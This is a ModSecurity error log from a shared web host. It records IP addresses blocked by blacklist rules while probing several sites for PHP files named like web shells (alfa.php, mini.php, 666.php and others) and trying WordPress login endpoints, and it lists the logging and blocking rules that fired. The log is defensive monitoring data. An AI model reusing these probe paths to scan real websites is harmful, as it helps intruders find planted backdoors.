[Tue May 26 18:39:24.043604 2026] [security2:error] [pid 1015481:tid 1015715] [client 20.196.127.68:3883] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/ioxi-o.php"] [unique_id "ahWbhLQIKfWDMlp2INdPOgAAAXI"]
[Tue May 26 18:39:24.205789 2026] [security2:error] [pid 1015481:tid 1015681] [client 130.131.224.225:64421] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/inputs.php"] [unique_id "ahWbhLQIKfWDMlp2INdPPwAAAVA"]
[Tue May 26 18:39:24.205917 2026] [security2:error] [pid 1015481:tid 1015681] [client 130.131.224.225:64421] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/inputs.php"] [unique_id "ahWbhLQIKfWDMlp2INdPPwAAAVA"]
[Tue May 26 18:39:24.433513 2026] [core:crit] [pid 1015481:tid 1015710] (13)Permission denied: [client 157.55.39.59:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:39:24.584864 2026] [security2:error] [pid 1015481:tid 1015678] [client 130.131.224.225:24547] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/samll.php"] [unique_id "ahWbhLQIKfWDMlp2INdPTgAAAU0"]
[Tue May 26 18:39:24.584977 2026] [security2:error] [pid 1015481:tid 1015678] [client 130.131.224.225:24547] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/samll.php"] [unique_id "ahWbhLQIKfWDMlp2INdPTgAAAU0"]
[Tue May 26 18:39:24.680762 2026] [security2:error] [pid 1015481:tid 1015615] [client 20.196.127.68:10711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/in.php"] [unique_id "ahWbhLQIKfWDMlp2INdPUAAAAQ4"]
[Tue May 26 18:39:25.317296 2026] [security2:error] [pid 1015481:tid 1015669] [client 20.196.127.68:14219] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/info.php"] [unique_id "ahWbhbQIKfWDMlp2INdPZwAAAUQ"]
[Tue May 26 18:39:25.771618 2026] [security2:error] [pid 1015481:tid 1015645] [client 130.131.224.225:37379] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahWbhbQIKfWDMlp2INdPeQAAASw"]
[Tue May 26 18:39:25.771746 2026] [security2:error] [pid 1015481:tid 1015645] [client 130.131.224.225:37379] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahWbhbQIKfWDMlp2INdPeQAAASw"]
[Tue May 26 18:39:25.938098 2026] [security2:error] [pid 1015481:tid 1015677] [client 20.196.127.68:14249] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/inputs.php"] [unique_id "ahWbhbQIKfWDMlp2INdPewAAAUw"]
[Tue May 26 18:39:26.500836 2026] [security2:error] [pid 1015481:tid 1015673] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbhrQIKfWDMlp2INdPfgAAAUg"]
[Tue May 26 18:39:26.548221 2026] [security2:error] [pid 1015481:tid 1015707] [client 20.196.127.68:6774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/item.php"] [unique_id "ahWbhrQIKfWDMlp2INdPjQAAAWo"]
[Tue May 26 18:39:26.758586 2026] [security2:error] [pid 1015481:tid 1015663] [client 20.151.117.104:14116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/inputs.php"] [unique_id "ahWbhrQIKfWDMlp2INdPlAAAAT4"]
[Tue May 26 18:39:27.022592 2026] [security2:error] [pid 1015481:tid 1015612] [client 20.151.117.104:14138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/admin.php"] [unique_id "ahWbh7QIKfWDMlp2INdPoAAAAQs"]
[Tue May 26 18:39:27.129422 2026] [security2:error] [pid 1015481:tid 1015628] [client 20.196.127.68:3901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/k.php"] [unique_id "ahWbh7QIKfWDMlp2INdPoQAAARs"]
[Tue May 26 18:39:27.184862 2026] [security2:error] [pid 1015481:tid 1015489] [remote 216.73.216.30:13118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWbh7QIKfWDMlp2INdPpgABcAc"]
[Tue May 26 18:39:27.274559 2026] [security2:error] [pid 1015481:tid 1015638] [client 20.151.117.104:14124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/goods.php"] [unique_id "ahWbh7QIKfWDMlp2INdPqQAAASU"]
[Tue May 26 18:39:27.288954 2026] [security2:error] [pid 1015481:tid 1015656] [client 130.131.224.225:51047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/favicon.php"] [unique_id "ahWbh7QIKfWDMlp2INdPqgAAATc"]
[Tue May 26 18:39:27.289032 2026] [security2:error] [pid 1015481:tid 1015656] [client 130.131.224.225:51047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/favicon.php"] [unique_id "ahWbh7QIKfWDMlp2INdPqgAAATc"]
[Tue May 26 18:39:27.502828 2026] [security2:error] [pid 1015481:tid 1015627] [client 20.151.117.104:10307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/file.php"] [unique_id "ahWbh7QIKfWDMlp2INdPrQAAARo"]
[Tue May 26 18:39:27.708512 2026] [security2:error] [pid 1015481:tid 1015672] [client 20.196.127.68:6868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/license.php"] [unique_id "ahWbh7QIKfWDMlp2INdPsgAAAUc"]
[Tue May 26 18:39:27.746716 2026] [security2:error] [pid 1015481:tid 1015681] [client 20.151.117.104:14064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/adminfuns.php"] [unique_id "ahWbh7QIKfWDMlp2INdPtQAAAVA"]
[Tue May 26 18:39:27.882515 2026] [security2:error] [pid 1015481:tid 1015657] [client 130.131.224.225:42430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/aboutc.php"] [unique_id "ahWbh7QIKfWDMlp2INdPvAAAATg"]
[Tue May 26 18:39:27.882659 2026] [security2:error] [pid 1015481:tid 1015657] [client 130.131.224.225:42430] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/aboutc.php"] [unique_id "ahWbh7QIKfWDMlp2INdPvAAAATg"]
[Tue May 26 18:39:28.006996 2026] [security2:error] [pid 1015481:tid 1015647] [client 20.151.117.104:14120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/404.php"] [unique_id "ahWbiLQIKfWDMlp2INdPwQAAAS4"]
[Tue May 26 18:39:28.253873 2026] [security2:error] [pid 1015481:tid 1015637] [client 20.151.117.104:14139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wk/index.php"] [unique_id "ahWbiLQIKfWDMlp2INdPywAAASQ"]
[Tue May 26 18:39:28.294139 2026] [security2:error] [pid 1015481:tid 1015716] [client 20.196.127.68:6753] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/load.php"] [unique_id "ahWbiLQIKfWDMlp2INdPzwAAAXM"]
[Tue May 26 18:39:28.510679 2026] [security2:error] [pid 1015481:tid 1015630] [client 20.151.117.104:10309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/about.php"] [unique_id "ahWbiLQIKfWDMlp2INdP1AAAAR0"]
[Tue May 26 18:39:28.655825 2026] [security2:error] [pid 1015481:tid 1015682] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbiLQIKfWDMlp2INdPyAAAAVE"]
[Tue May 26 18:39:28.689650 2026] [security2:error] [pid 1015481:tid 1015619] [client 130.131.224.225:30671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-load.php"] [unique_id "ahWbiLQIKfWDMlp2INdP3gAAARI"]
[Tue May 26 18:39:28.689796 2026] [security2:error] [pid 1015481:tid 1015619] [client 130.131.224.225:30671] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/wp-load.php"] [unique_id "ahWbiLQIKfWDMlp2INdP3gAAARI"]
[Tue May 26 18:39:28.746376 2026] [security2:error] [pid 1015481:tid 1015651] [client 20.151.117.104:14092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/term.php"] [unique_id "ahWbiLQIKfWDMlp2INdP4AAAATI"]
[Tue May 26 18:39:28.774990 2026] [security2:error] [pid 1015481:tid 1015705] [client 34.116.215.253:10282] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahWbdLQIKfWDMlp2INdNywABaBg"], referer: https://politica-global.com/
[Tue May 26 18:39:28.894496 2026] [security2:error] [pid 1015481:tid 1015679] [client 20.196.127.68:8104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/manager.php"] [unique_id "ahWbiLQIKfWDMlp2INdP4wAAAU4"]
[Tue May 26 18:39:28.989399 2026] [security2:error] [pid 1015481:tid 1015662] [client 20.151.117.104:14095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/ioxi-o.php"] [unique_id "ahWbiLQIKfWDMlp2INdP5wAAAT0"]
[Tue May 26 18:39:29.237076 2026] [security2:error] [pid 1015481:tid 1015672] [client 20.151.117.104:14025] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "www.thegoodsporting.com"] [uri "/1.php"] [unique_id "ahWbibQIKfWDMlp2INdP7AAAAUc"]
[Tue May 26 18:39:29.237183 2026] [security2:error] [pid 1015481:tid 1015672] [client 20.151.117.104:14025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/1.php"] [unique_id "ahWbibQIKfWDMlp2INdP7AAAAUc"]
[Tue May 26 18:39:29.455016 2026] [security2:error] [pid 1015481:tid 1015617] [client 130.131.224.225:63140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/aevly.php"] [unique_id "ahWbibQIKfWDMlp2INdP8wAAARA"]
[Tue May 26 18:39:29.455151 2026] [security2:error] [pid 1015481:tid 1015617] [client 130.131.224.225:63140] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/aevly.php"] [unique_id "ahWbibQIKfWDMlp2INdP8wAAARA"]
[Tue May 26 18:39:29.471785 2026] [security2:error] [pid 1015481:tid 1015634] [client 20.151.117.104:14077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/alfa.php"] [unique_id "ahWbibQIKfWDMlp2INdP9wAAASE"]
[Tue May 26 18:39:29.499909 2026] [security2:error] [pid 1015481:tid 1015611] [client 20.196.127.68:4369] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/media.php"] [unique_id "ahWbibQIKfWDMlp2INdP-gAAAQo"]
[Tue May 26 18:39:29.559946 2026] [security2:error] [pid 1015481:tid 1015655] [client 124.43.5.103:62545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbibQIKfWDMlp2INdP8AAAATY"]
[Tue May 26 18:39:29.560105 2026] [security2:error] [pid 1015481:tid 1015655] [client 124.43.5.103:62545] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbibQIKfWDMlp2INdP8AAAATY"]
[Tue May 26 18:39:29.696458 2026] [security2:error] [pid 1015481:tid 1015640] [client 20.151.117.104:14027] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/edit.php"] [unique_id "ahWbibQIKfWDMlp2INdQBAAAASc"]
[Tue May 26 18:39:29.937789 2026] [security2:error] [pid 1015481:tid 1015704] [client 20.151.117.104:14078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/elp.php"] [unique_id "ahWbibQIKfWDMlp2INdQCQAAAWc"]
[Tue May 26 18:39:30.125074 2026] [security2:error] [pid 1015481:tid 1015734] [client 20.196.127.68:14208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/mar.php"] [unique_id "ahWbirQIKfWDMlp2INdQEAAAAYU"]
[Tue May 26 18:39:30.173936 2026] [security2:error] [pid 1015481:tid 1015725] [client 20.151.117.104:14038] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/classwithtostring.php"] [unique_id "ahWbirQIKfWDMlp2INdQEQAAAXw"]
[Tue May 26 18:39:30.184872 2026] [security2:error] [pid 1015481:tid 1015538] [remote 195.33.205.242:48204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 242.205.33.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbibQIKfWDMlp2INdQDAABejg"]
[Tue May 26 18:39:30.421270 2026] [security2:error] [pid 1015481:tid 1015705] [client 20.151.117.104:14053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/666.php"] [unique_id "ahWbirQIKfWDMlp2INdQHwAAAWg"]
[Tue May 26 18:39:30.522296 2026] [security2:error] [pid 1015481:tid 1015541] [remote 195.33.205.242:48204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 242.205.33.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbirQIKfWDMlp2INdQIAABOjs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:39:30.745857 2026] [security2:error] [pid 1015481:tid 1015646] [client 20.151.117.104:14135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/ws54.php"] [unique_id "ahWbirQIKfWDMlp2INdQNAAAAS0"]
[Tue May 26 18:39:30.790222 2026] [security2:error] [pid 1015481:tid 1015625] [client 130.131.224.225:64901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/atkno.php"] [unique_id "ahWbirQIKfWDMlp2INdQNQAAARg"]
[Tue May 26 18:39:30.790335 2026] [security2:error] [pid 1015481:tid 1015625] [client 130.131.224.225:64901] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/atkno.php"] [unique_id "ahWbirQIKfWDMlp2INdQNQAAARg"]
[Tue May 26 18:39:30.794828 2026] [security2:error] [pid 1015481:tid 1015694] [client 20.196.127.68:4771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/my1.php"] [unique_id "ahWbirQIKfWDMlp2INdQNgAAAV0"]
[Tue May 26 18:39:31.013868 2026] [security2:error] [pid 1015481:tid 1015729] [client 20.151.117.104:14089] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/deepseek_d.php"] [unique_id "ahWbi7QIKfWDMlp2INdQOgAAAYA"]
[Tue May 26 18:39:31.268578 2026] [security2:error] [pid 1015481:tid 1015643] [client 20.151.117.104:14028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/function/function.php"] [unique_id "ahWbi7QIKfWDMlp2INdQOwAAASo"]
[Tue May 26 18:39:31.285931 2026] [security2:error] [pid 1015481:tid 1015634] [client 130.131.224.225:25795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/mini.php"] [unique_id "ahWbi7QIKfWDMlp2INdQPAAAASE"]
[Tue May 26 18:39:31.286063 2026] [security2:error] [pid 1015481:tid 1015634] [client 130.131.224.225:25795] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/mini.php"] [unique_id "ahWbi7QIKfWDMlp2INdQPAAAASE"]
[Tue May 26 18:39:31.416174 2026] [security2:error] [pid 1015481:tid 1015617] [client 20.196.127.68:3895] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/mm.php"] [unique_id "ahWbi7QIKfWDMlp2INdQQQAAARA"]
[Tue May 26 18:39:31.552973 2026] [security2:error] [pid 1015481:tid 1015657] [client 20.151.117.104:14117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/nw.php"] [unique_id "ahWbi7QIKfWDMlp2INdQQwAAATg"]
